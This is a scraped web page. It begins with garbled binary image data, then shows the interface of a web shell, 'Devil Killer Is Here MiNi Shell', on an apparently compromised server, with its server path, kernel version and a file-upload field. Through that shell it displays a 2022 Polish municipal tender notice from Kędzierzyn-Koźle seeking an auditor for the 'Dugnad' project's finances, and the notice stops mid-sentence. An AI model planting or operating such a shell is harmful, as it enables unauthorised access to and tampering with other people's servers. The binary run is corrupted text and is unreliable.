JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220204/0004646701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Badanie przez biegłego rewidenta dokumentów finansowo-księgowych projektu „Dugnad <br/>w Kędzierzynie-Koźlu (…)” realizowanego w ramach Programu „Rozwój Lokalny” - II POSTĘPOWANIE </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Kędzierzyn-Koźle - Urząd Miasta</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Wydział Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531412912</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piramowicza 32</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kędzierzyn-Koźle</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">47-220</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@kedzierzynkozle.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.kedzierzynkozle.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Badanie przez biegłego rewidenta dokumentów finansowo-księgowych projektu „Dugnad <br/>w Kędzierzynie-Koźlu (…)” realizowanego w ramach Programu „Rozwój Lokalny” - II POSTĘPOWANIE </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-86e107a8-827d-11ec-83b1-bea871b78b5b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00046467</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00027756/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.32 Usługi audytu finansowego przez biegłego rewidenta badającego sprawozdania i dokumenty finansowe realizowanych projektów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-propublico.pl/Zamawiajacy/AktualneOgloszenia?zamawiajacyId=f15dda4c-01df-4c59-b90f-a767d9826443 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://e-propublico.pl/Zamawiajacy/AktualneOgloszenia?zamawiajacyId=f15dda4c-01df-4c59-b90f-a767d9826443</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy on-line działającej pod adresem https://e-propublico.pl. 2. W uzasadnionych przypadkach np. awarii platformy dopuszczalna jest komunikacja za pośrednictwem poczty elektronicznej na adresy wskazane poniżej, z zastrzeżeniem, że ofertę składa się tylko za pośrednictwem platformy e-ProPublico. 3. Korzystanie z Platformy przez Wykonawcę jest bezpłatne. 4. Postępowanie prowadzone jest na Platformie pod nazwą: Badanie przez biegłego rewidenta dokumentów finansowo-księgowych projektu „Dugnad w Kędzierzynie-Koźlu (…)” realizowanego w ramach Programu „Rozwój Lokalny” - II postępowanie– znak sprawy: ZP.271.1.4.2022.AP. 5. Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z Platformy określone w Regulaminie zamieszczonym na stronie internetowej https://e-ProPublico.pl/ oraz uznaje go za wiążący. 6. Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto na Platformie. 7. Zamawiający określa następujące wymagania sprzętowo – aplikacyjne pozwalające na korzystanie z Platformy: 1) stały dostęp do sieci Internet, 2) posiadanie dowolnej i aktywnej skrzynki poczty elektronicznej (e-mail), 3) komputer z zainstalowanym systemem operacyjnym Windows 7 (lub nowszym) albo Linux, 4) zainstalowana dowolna przeglądarka internetowa - Platforma współpracuje z najnowszymi, stabilnymi wersjami wszystkich głównych przeglądarek internetowych (Internet Explorer 10+, Microsoft Edge, Mozilla Firefox, Google Chrome, Opera), 5) włączona obsługa JavaScript oraz Cookies. 8. Zamawiający dopuszcza następujący format przesyłanych danych: pliki o wielkości do 20 MB w formatach: .pdf, .doc, .docx, .xls, .xlsx, .xml. 9. Zalecenia Zamawiającego odnośnie kwalifikowanego podpisu elektronicznego: 1) dokumenty sporządzone i przesyłane w formacie .pdf zaleca się podpisywać kwalifikowanym podpisem elektronicznym w formacie PAdES; 2) dokumenty sporządzone i przesyłane w formacie innym niż .pdf (np.: .doc, .docx, .xls, .xlsx, .xml) zaleca się podpisywać kwalifikowanym podpisem elektronicznym w formacie XAdES; 3) do składania kwalifikowanego podpisu elektronicznego zaleca się stosowanie algorytmu SHA-2 (lub wyższego). 10. Zamawiający określa następujące informacje na temat kodowania i czasu odbioru danych: 1) załączony i przesłany przez Wykonawcę za pomocą Platformy plik oferty wraz z załącznikami, nie jest dostępny dla Zamawiającego i przechowywany jest na serwerach Platformy w formie zaszyfrowanej. Zamawiający otrzyma dostęp do pliku dopiero po upływie terminu otwarcia ofert; 2) oznaczenie czasu odbioru danych przez Platformę stanowi przyporządkowaną do dokumentu elektronicznego datę oraz dokładny czas (hh:mm:ss), widoczne przy wysłanym dokumencie w kolumnie ”Data przesłania”; 3) o terminie przesłania decyduje czas pełnego przeprocesowania transakcji pliku na Platformie. 11. Szczegółowe informacje o sposobie porozumiewania się i wymagania formalne dotyczące składanych dokumentów zostały opisano w rozdziale 13 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: 1) administratorem Pani/Pana danych osobowych jest Urząd Miasta Kędzierzyn-Koźle, z siedzibą przy ul. Grzegorza Piramowicza 32, 47-200 Kędzierzyn-Koźle, adres e-mail: prezydent@kedzierzynkozle.pl, tel. 77/40-50-338; 2) sposób kontaktu z inspektorem ochrony danych osobowych w Urzędzie Miasta Kędzierzyn-Koźle: 47-200 Kędzierzyn-Koźle, ul. Grzegorza Piramowicza 32, adres e-mail: inspektor@kedzierzynkozle.pl, tel. 77/40-50-346; 3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego; 4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy Pzp, a także Spółka Datacomp Sp. z o.o. z siedzibą w Krakowie (adres: ul. Gen. Henryka Dąbrowskiego 24, 30-532 Kraków), nr Rejestru KRS 0000193067, jako właściciel Platformy on-line działającej pod adresem https://e-ProPublico.pl/, na której Zamawiający prowadzi postępowania o udzielenie zamówienia publicznego; 5) Pani/Pana dane osobowe oraz wszelka dokumentacja związana z realizacją projektu będą przechowywane przez co najmniej przez 5 lat od dnia przyjęcia przez Komitet Mechanizmu Finansowego i Norweskie Ministerstwo Spraw Zagranicznych Raportu końcowego dla Programu „Rozwój Lokalny” w sposób zapewniający dostępność, poufność i bezpieczeństwo oraz do informowania o miejscu jej przechowywania; 6) zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 18 stycznia 2011r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych (tj. Dz.U z 2011 nr 14, poz. 67 z późn. zm.) teczki aktowe będą przechowywane w archiwum zakładowym przez okres 5 lat w przypadku dokumentacji zamówień publicznych oraz 10 lat w przypadku umów zawartych w wyniku postępowania w trybie zamówień publicznych oraz zgodnie z zasadami archiwizacji zamówień dofinansowanych; 7) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; 8) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">c.d. 9) posiada Pani/Pan: - na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; - w przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego; - na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (przy czym korzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników); - na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego); - wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego; - prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, jeśli uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; 2. nie przysługuje Pani/Panu: - w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; - prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; - na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. 3. Jednocześnie Zamawiający przypomina o ciążącym na Wykonawcy obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od Wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO. 4. Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp. 5. W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.4.2022.AP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> A.	Zakres zamówienia obejmuje kontrolę prawidłowości wydatkowania przyznanego dofinansowania ze środków Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego i Budżetu Państwa przez lidera projektu, operatorów projektu oraz partnerów projektu prowadzoną przez podmiot uprawniony do badania sprawozdań finansowych. <br/>1.	Zakres przedmiotowy zamówienia obejmuje kontrolę prawidłowości wydatkowania przyznanego dofinansowania bezpośrednio w siedzibie:<br/>1)	Lidera Projektu, tj. Gminy Kędzierzyn-Koźle;<br/>2)	w siedzibach Operatorów Projektu, tj. Miejskiego Ośrodka Pomocy Społecznej w Kędzierzynie-Koźlu, Miejskiego Ośrodka Sportu i Rekreacji w Kędzierzynie-Koźlu, Miejskiej Biblioteki Publicznej w Kędzierzynie-Koźlu oraz Miejskiego Ośrodka Kultury w Kędzierzynie-Koźlu;<br/>3)	w siedzibach Partnerów Projektu, tj. Klubu Sportowego Koziołek w Kędzierzynie-Koźlu, Kędzierzyńsko-Kozielskiego Parku Przemysłowego sp. z o.o. w Kędzierzynie-Koźlu, Europa Iuvenis w Opolu),<br/>zgodnie z ustawą z dnia 11 maja 2017r. o biegłych rewidentach, firmach audytorskich oraz nadzorze publicznym (Dz. U. 2020, poz. 1415 z późn. zm.) oraz z postanowieniami, zawartymi w Umowie w sprawie projektu pn. „Dugnad w Kędzierzynie-Koźlu. Integracja mieszkańców oraz odbudowa relacji sąsiedzkich jako podstawa rozwoju lokalnego” finansowanego ze środków MF EOG 2014-2021 i BP, zwanego dalej „Projektem”, dotyczącymi sprawozdawczości finansowej.<br/><br/>2.	Przedmiot zamówienia obejmuje w szczególności sprawdzenie i analizę przygotowywanych przez Zamawiającego „Raportów z realizacji projektu” (okresowych, rocznych i końcowego) na które składają się: „Rozliczenie ze względu na źródło finansowania”, „Rozliczenie transz dofinansowania” „Zestawienie dokumentów księgowych” wraz z dokumentami wskazywanymi w ww. dokumentach (m.in. fakturami/protokołami odbioru prac/potwierdzeniami dokonania przelewów), zgodność z polityką rachunkowości danej jednostki, a także każdorazowo przygotowania stosownego „Protokołu z badania raportu z realizacji projektu przez biegłego rewidenta”, zgodnie z wzorem protokołu stanowiącym załącznik nr 10 do SWZ, w terminach wskazanych w pkt 9 i 10. <br/>3.	Badanie części finansowej sprawozdania okresowego, rocznego i końcowego z wykorzystania dofinansowania, obejmuje w szczególności ocenę: <br/>a)	kompletności, poprawności, rzetelności sprawozdań finansowych dotyczących zrealizowanych wydatków w Projekcie z umową dotacyjną projektu, <br/>b)	prawidłowości kwalifikalności poniesionych wydatków w Projekcie, zgodnie z obowiązującą wersją dokumentu „Regulacje w sprawie wdrażania Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego (EOG) na lata 2014-2021” dostępnego na stronie internetowej: <br/>https://www.eog.gov.pl/strony/zapoznaj-sie-z-funduszami/podstawy-prawne/regulacje/regulacje-w-sprawie-wdrazania-mechanizmu-finansowego-europejskiego-obszaru-gospodarczego-eog-na-lata-2014-2021/<br/>c)	zgodności kategorii i wysokości poniesionych wydatków z wydatkami planowanymi, <br/>d)	kompletności dokumentacji potwierdzającej poniesione wydatki, <br/>e)	zgodności wydatków w Projekcie przedstawionych w sprawozdaniach finansowych z wydatkami w wyodrębnionej dla Projektu ewidencji księgowej, <br/>f)	zachowania terminów związanych z ponoszeniem wydatków, <br/>g)	zachowania terminów związanych z rozliczaniem się ze środków dotacji, <br/>h)	poprawności dokumentacji potwierdzającej poniesione wydatki, <br/>i)	poprawności przeliczeń kursowych (jeśli występują), <br/>j)	poprawności dokumentacji pod względem zgodności z powszechnie obowiązującymi aktualnymi przepisami prawa w szczególności z ustawą o finansach publicznych, ustawą o rachunkowości. <br/>4.	Wynikiem badania prowadzonego przez biegłego rewidenta będzie ocena sporządzona na wzorze Protokołu, uwzględniająca odpowiedź na następujące pytania: czy część finansowa sprawozdania jest prawidłowa, czy kwota przedstawiona do rozliczenia w sprawozdaniu jest zgodna z dokumentami źródłowymi (m.in. fakturami/ rachunkami/umowami) oraz dokumentami potwierdzającymi dokonanie płatności (przelewy), czy wydatki zostały prawidłowo zaklasyfikowane do kategorii wydatków bieżących i majątkowych. W protokole powinny zostać zawarte rekomendacje i zalecenia pokontrolne (jeżeli takie wystąpią).<br/>5.	Zamawiający wymaga, aby badanie Raportu z realizacji projektu było oparte na zweryfikowaniu 100% dokumentacji, a nie wybranych losowo dokumentach.<br/>6.	Biegły rewident w toku realizacji usługi będzie zobowiązany do dokonania minimum jednokrotnej wizyty kontrolnej u każdego z podmiotów realizujących projekt, wskazanych w pkt 1. Celem ww. wizyt będzie sprawdzenie zgodności wydatków z polityką rachunkowości oraz weryfikacja wszystkich dokumentów wytworzonych w ramach Projektu (u każdego z podmiotów). Dla usprawnienia bieżących prac, dokumentacja może być przesyłana Wykonawcy do weryfikacji w formie elektronicznej. <br/>7.	Zamawiający przewiduje, że „Raporty z realizacji projektu” (które są przedmiotem kontroli biegłego rewidenta) składane będą przez niego okresowo, po wydatkowaniu min. 70% przekazanej transzy dotacji, co umożliwi wnioskowanie o kolejną transze dotacji. Zamawiający szacuje, że do sprawdzenia przekazane zostaną maksymalnie cztery raporty - w tym przewiduje się trzy raporty okresowe (w roku 2022 – 1 szt, w roku 2023 - 1 lub 2 szt) i jeden raport końcowy (w 2024 r). Raport okresowy może zostać zastąpiony przez Raport roczny jeżeli wraz ze sprawozdaniem merytorycznym (stanowiącym CZĘŚĆ „A” Raportu), Zamawiający będzie rozliczał jednocześnie sprawozdanie finansowe i wnioskował o kolejną transzę dotacji (czyli będzie składał CZĘŚĆ „B” Raport finansowy). Brak sztywnego harmonogramu przekazywania Raportów okresowych przez Zamawiającego wynika z faktu, że termin ich przygotowania zależny jest od osiągnięcia wymaganego umową poziomu wydatkowania 70 % przyznanych uprzednio transz dotacji.<br/>8.	Rozliczenie wykonania zamówienia nastąpi w oparciu o rzeczywistą liczbę przygotowanych przez biegłego rewidenta Protokołów. Zamawiający zastrzega, że termin i liczba przygotowywanych przez niego Raportów w kolejnych latach może ulec zmianie w stosunku do ilości wskazanej w pkt 7, przy czym łączna liczba Raportów nie powinna przekroczyć czterech. <br/>Powyższe wynikać może ze zmiany terminów realizacji poszczególnych przedsięwzięć i ich finansowania, a w konsekwencji zmiany terminów wystawienia i opłacania faktur lub innych dokumentów finansowo-księgowych, będących podstawą przygotowania części finansowej każdego z Raportów, a stanowiącego przedmiot oceny i kontroli prowadzonej przez biegłego rewidenta. <br/>9.	Zamawiający oświadcza, iż termin zakończenia realizacji Projektu przypada na dzień 30 kwietnia 2024r. Wykonawca zobowiązuje się wykonać przedmiot umowy opisany w pkt 1 w terminie do dnia 30 kwietnia 2024r., z zastrzeżeniem terminów wskazanych w pkt 10. <br/>10.	Wykonawca wykona czynności objęte przedmiotem zamówienia w następujących terminach:<br/>a)	dla Raportów okresowych – przygotuje i przekaże Protokół z badania raportu z realizacji projektu przez biegłego rewidenta w terminie 14 dni kalendarzowych od dnia udostępnienia dokumentów objętych sprawdzanym Raportem okresowym,<br/>b)	dla Raportów rocznych – przygotuje i przekaże Protokół z badania raportu z realizacji projektu przez biegłego rewidenta w terminie 14 dni kalendarzowych od dnia udostępnienia dokumentów objętych sprawdzanym Raportem rocznym, ale nie później niż do 18 stycznia kolejnego roku sprawozdawczego, rozpoczynając od stycznia 2023r., <br/>c)	dla Raportu końcowego – przygotuje i przekaże Protokół z badania raportu z realizacji projektu przez biegłego rewidenta w terminie do 30 kwietnia 2024 r.,<br/>d)	w przypadku stwierdzonych przez Ministerstwo Funduszy i Polityki Regionalnej, nieprawidłowości w Raporcie, wymagających korekty Protokołu z badania raportu z realizacji projektu przez biegłego rewidenta, Wykonawca w ciągu 5 dni roboczych od dnia przekazania informacji o konieczności korekty dokona nieodpłatnie ponownej weryfikacji poprawionego przez Zamawiającego Raportu. <br/>11.	Wskazane w pkt 9-10 terminy mogą ulec zmianie, w wyniku zmiany postanowień dot. terminu zakończenia realizacji projektu objętego Umową w sprawie projektu pn. „Dugnad w Kędzierzynie-Koźlu. Integracja mieszkańców oraz odbudowa relacji sąsiedzkich jako podstawa rozwoju lokalnego” finansowanego ze środków MF EOG 2014-2021, jak również zmiany wytycznych dot. sprawozdawczości, zawartych w Podręczniku Beneficjenta Programu Rozwój Lokalny.<br/>12.	Wskazane terminy przygotowania raportów oraz ich liczba w poszczególnych latach, o których mowa w pkt 